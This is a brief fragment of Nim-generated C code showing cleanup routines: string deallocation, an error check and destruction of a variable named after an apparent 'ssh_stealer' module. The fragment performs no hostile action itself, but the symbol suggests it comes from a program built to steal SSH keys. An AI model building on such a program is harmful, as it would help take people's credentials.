	}
	{
		if (colontmpD_.p && !(colontmpD_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD_.p);
}
	}
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	nimln_(2123);	eqdestroy___system_u3869(keys__ssh95stealer_u185);
	BeforeRet_: ;
	nimTestErrorFlag();
	popFrame();
}
}

